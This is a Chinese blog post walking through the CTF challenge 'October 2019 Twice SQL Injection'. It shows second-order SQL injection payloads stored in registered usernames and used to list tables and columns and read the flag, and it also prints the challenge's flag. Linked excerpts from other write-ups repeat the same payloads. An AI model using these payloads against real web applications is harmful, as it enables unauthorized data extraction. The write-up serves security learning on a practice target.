buuctf-web-October 2019 Twice SQL Injection1

最新推荐文章于 2023-04-23 11:45:24 发布
最新推荐文章于 2023-04-23 11:45:24 发布
阅读量262 收藏 1
点赞数
分类专栏: 网络安全 buuctfweb ctf 文章标签: ctf 安全 sql sql注入 Powered by 金山文档
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_29977871/article/details/129475075
版权
ctf 同时被 3 个专栏收录
70 篇文章 2 订阅
订阅专栏
网络安全
30 篇文章 0 订阅
订阅专栏
buuctfweb
28 篇文章 0 订阅
订阅专栏

看这题目,二次注入,打开环境

到注册界面随便注册一个用户后登录

登录后界面如下

测试输入1,回显1

输入测试2'

回显2\'

重新注册账号为admin' union select database()#,密码123456(此处此方法无用,账号必须是数字)

注册账号为1' union select database()#,密码为123

重新登录,发现显示数据库为ctftraining

随后就是sql注入常规操作,爆库爆表爆字段读内容,继续注册账户名带注入语句的用户

1' union select group_concat(table_name) from information_schema.tables where table_schema=database()#

1' union select group_concat(column_name) from information_schema.columns where table_name='flag'#

1' union select flag from flag #

得到flag

flag{832f6091-35b5-48e6-aa88-fe19ddb700a5}

mlws1900
关注
  • 0
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
BUUCTF-WEB
ccfly1012的博客
11-02 3855
目录 [HCTF 2018]WarmUp [极客大挑战 2019]EasySQL 总结万能密码 [极客大挑战 2019]Havefun [强网杯 2019]随便注 [ACTF2020 新生赛]Include [SUCTF 2019]EasySQL [极客大挑战 2019]Secret File [ACTF2020 新生赛]Exec [极客大挑战 2019]LoveSQL [GXYCTF2019]Ping Ping Ping [HCTF 2018]WarmUp 打开网页,查看一下源代
go-sql-driver mysql_golang go-sql-driver/mysql基本原理
weixin_35933239的博客
01-21 347
上篇文章关于golang database_sql 包讲述了 database/sql 的整体设计框架。本文简要介绍go-sql-driver/mysql的调用关系,是如何与database/sql关联起来的,包括从驱动注册到具体查询,每个步骤的底层调用。我们查询MySQL的大体代码demo如下:package mainimport ("database/sql""log"_ "github.co...
BUUCTF--October 2019 Twice SQL Injection
qq_46263951的博客
07-30 1115
根据题目可以知道这是一个二次注入题 注册时把我们sql语句放到username处,登录后即可看到我们想要的信息 payload为: username =1' union select database() # username =1' union select group_concat(table_name) from information_schema.tables where table_schema='ctftraining' # username =1' union select gr
buu-October 2019 Twice SQL Injection
qaq517384的博客
10-26 533
标题朴实无华的二次注入 两个注入点,注册和改info rua' union select database() # 在注册的user处可以找到二次注入点 没有特殊的过滤,四步正常走就行 rua' union select database() # rua' union select group_concat(table_name) from information_schema.tables where table_schema='ctftraining' # rua' union select gro
October 2019 Twice SQL Injection
m0_62905261的博客
08-02 755
October 2019 Twice SQL Injection
buuctf XCTF October 2019 Twice SQL Injection 二次注入原理+题解
AAAAAAAAAAAA66的博客
12-21 2349
这里要吐槽一点XCTF,之前翻题目时发现有道10分的,还是二次注入,还是0人做出,看了write up觉得还挺简单,就想混着写一下,结果0人做出的原因居然是环境打不开。然后在buuctf 平台找到了这道题,所以就试着写下write up。 目录 二次注入 二次注入的成因 二次注入常出现的地方 题解 思路 步骤 二次注入 二次注入的成因 由于开发者为了防御sql注入,使网站对我们输入的恶意语句中的一些重要的关键字进行了转义,使恶意的sql注入无法执行(比如说将单引号转义...
[October 2019]Twice SQL Injection
最新发布
J_linnb的博客
04-23 508
一. 题目是二次SQL注入,我们先了解一下二次注入原理: 二次注入的原理,在第一次进行数据库插入数据的时候,仅仅只是使用了 addslashes 或者是借助 get_magic_quotes_gpc 对其中的特殊字符进行了转义,但是addslashes有一个特点就是虽然参数在过滤后会添加 “\” 进行转义,但是“\”并不会插入到数据库中,在写入数据库的时候还是保留了原来的数据。 在将数据存入到了数据库中之后,开发者就认为数据是可信的。在下一次进行需要进行查询的时候,直接从数据库中取出了脏数据,没有进行进一
Exercise(3-1a).zip_Euler_cstr_matlab_twice1de
07-15
"twice1de"可能是指该问题涉及到两个一阶微分方程。在CSTR模型中,通常会有一个反应进度的微分方程和一个能量平衡的微分方程,两者可能都需要用到欧拉方法或者其他数值解法进行求解。 在Exercise(3-1a)这个文件中,...
twice:TWICE-基于Web的交互式环境的工具包
05-17
基于Web的交互式协作环境的工具包。 请访问以获取有关如何使用代码和工具包的进一步说明。 文档工作仍在进行中,并且会不断完善-请重新访问页面以进行更新,并让我们知道您希望在跟踪列表中将重点放在哪些模块和...
Sekiro: Shadows Die Twice New Tab-crx插件
03-14
Sekiro:Shadows Die Twice New Tab Extension使您的Chrome浏览器焕然一新。 安装“ Sekiro:Shadows Die Twice”新标签,并享受Sekiro:Shadows Die Twice的精选高清图像。 它带有一些很酷的属性,这些属性可以改善...
SQL INJECTION注入之经典教程
06-28
关于SQL注入的两篇经典文章,国外的专业机构写的.对于有一定SQL编程经验又想了解SQL inject的人来说是不错的教程.
(三)October 2019 Twice SQL Injection
qq_53856457的博客
11-11 3975
标题明说二次注入(有埋伏?),先常规二次注入测试:注册用户名:admin"# 密码:123,并登 录。(此处没有任何过滤?)(info) 进行fuzz测试,结果发现常用符号传入被转义(此页面暂时放弃) 注意还有思路:注册+登录,将sql语句当用户名写入数据库,然后登陆,使语句执行(因为第一次注册登录测试中并未对”#进行waf) 注册尝试 用户名:xxx" union select database()# 密码:123456 登录成功,但无回显,尝试其他闭合方式...
Twice SQL Injection
追求卓越,技术流~
11-30 297
注册一个脏的数据,这个数据储存在数据库中,并没有执行任何结果,通过登入访问的时候,会结合sql语句执行拼接语句。注册一个账号,并且这个账号是脏数据,Username:admin’# Password:123。所以现在有一个数据用户名是admin,可能是用户。
BUUCTF-[SUCTF 2019]EasySQL
qq_44657899的博客
02-27 3810
打开题目, 测试发现过滤了很多字符,不过可以堆叠注入: 1;show tables;# 然后尝试读取表Flag, 发现union,prepare,handler等都过滤了,基本我会的方法都过滤了。。。 看了看wp,说是比赛时题目泄露了源码 select $_GET['query'] || flag from flag 然后有两种解 解题思路1: payload:*,1 查询语句:selec...
BUUCTF--[HarekazeCTF2019]Sqlite Voting
qq_46263951的博客
08-16 455
进入后是一个投票界面 查看给出的源码, 在 vote.php 页面 POST 参数 id ,只能为数字。并且在 schema.sql 中发现了 flag 表. //vote.php if (!isset($_POST['id']) || empty($_POST['id'])) { die(json_encode(['error' => 'You must specify vote id'])); } $id = $_POST['id']; if (!is_valid($id)) { .
BUU刷题记录——5
weixin_43610673的博客
09-21 1590
October 2019 Twice SQL Injection 由题目名可知为二次注入 username =1' union select database() # username =1' union select group_concat(table_name) from information_schema.tables where table_schema='ctftraining' # username =1' union select group
Web自动化测试实践:Selenium与协议驱动探索
"Web自动化测试 -- 百度" 在软件测试领域,Web自动化测试是一种提高测试效率和准确性的重要方法。本文将探讨Web自动化测试,特别是基于百度的实践案例,以及使用Selenium等工具进行自动化测试的一些关键点。 首先...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值